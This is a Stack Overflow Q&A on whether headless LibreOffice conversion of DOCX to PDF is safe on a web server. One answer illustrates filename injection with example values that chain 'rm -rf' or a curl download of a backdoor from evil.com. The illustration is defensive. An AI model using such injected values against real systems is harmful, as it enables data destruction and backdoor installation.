user875234
user875234

Reputation: 2517

Is LibreOffice (headless) safe to use on a web server?

I have my-template.docx that I convert into my-report.docx with OpenXml and then my-report.pdf with:

soffice --headless --convert-to pdf my-report.docx

I feel compelled to say that this functionality is very much appreciated 🙌. Anyways, one thing I can't find an answer to here (cli documentation) or here (comparison with MS Office) or my other post is if LibreOffice is safe for automation.

See this post from Microsoft that says not to use Word for server-side automation. That begs the question of whether LibreOffice is safe for server side automation? Basically I will be using C# to run soffice --headless --convert-to pdf my-report.docx anytime a request for a report comes in.

Is that safe?

*assume nobody else is trying to read my-report.docx

Upvotes: 12

Views: 15574

Answers (3)

LSerni
LSerni

Reputation: 57418

I have my-template.docx that I convert into my-report.docx with OpenXml and then my-report.pdf with:

soffice --headless --convert-to pdf my-report.docx

TL;DR in your case, it is.

What you're almost certainly doing is replacing some information inside the DOCX and using LibreOffice to have a "nice" conversion to PDF. While there are other tools that might do something like that (wkhtmltopdf for example), you're not using LibreOffice in any vulnerable way that I'm aware of (and I use LibreOffice like you do too):

  • the source document is under your control (no user-entered macros, remote file inclusions, remote data sources or other shenanigans)
  • the values you inject into the DOCX are also under your control - or are they? - and do not contain user input such as HREF targets that might make it into the PDF.
  • LibreOffice in headless mode does not expose any open ports or interfaces that might be exploited by a third process.

Possible but unlikely "exploit" avenues that might remain:

  • the destination file. I expect that even if you asked the user for the name of the resulting file, still you would do something like create a unique pdf filename, and send the user name as Content-Disposition: attachment; filename="thatswhatshesaid";, not using the user's filename on your filesystem and risking saving data to byebye.pdf && rm -rf ... (or irrelevant.pdf\x00; curl -o index2.php http://evil.com/backdoor.php or...), sending back a Location: downloads/whatshesaid.pdf.
  • very large values in the XML output that might trigger anomalous behaviour. Chances of this happening, and of doing so in any meaningful (for the attacker) way, are negligible, but still, nothing's wrong with checking.

Upvotes: 5

Paul Jowett
Paul Jowett

Reputation: 6581

Moggi's answer is a great one. The only things I can add are:

  1. you can consider improving the security by running the libreoffice (soffice) instance in a sandbox of some sort (eg Docker). That means that should something rogue happen, the sandbox can limit the potential damage,
  2. launching the process each time can be an overhead if your site becomes busy generating PDFs. If that happens, using a layer up (like JODConverter) can launch once use many times.

I hope that helps.

Upvotes: 3

moggi
moggi

Reputation: 1486

As long as you control the content of the input file there should be no issue at all. Keep in mind that LibreOffice only allows one active instance per user profile, so if you want to be able to process more than one document in parallel you should use separate user profiles.

If you have untrusted input data the whole question becomes more complex to answer. While there has been quite a bit of work securing the code base, a desktop office suite is still a huge piece of software with a lot of potential attack surfaces (macros, remote data connections, old binary file formats, ...). While all of these features should be blocked in headless operations you have to trust that there are no undiscovered bugs.

The remaining points in the Microsoft article should not apply to LibreOffice. The headless mode is designed not to interact with the desktop environment and except for the user profile does not change anything in the system or depends on any desktop related piece. The default builds will still depend on some GUI libraries but if that actually becomes a problem there is an experimental build option to build a non-GUI version without any X/GTK/KDE library dependencies.

As an alternative there are also a few projects built on top of LibreOffice that try to make converting documents even easier and might actually be faster by pre-forking or using the LibreOfficeKit API. Two examples are JODConverter or unoconv.

Upvotes: 17

Related Questions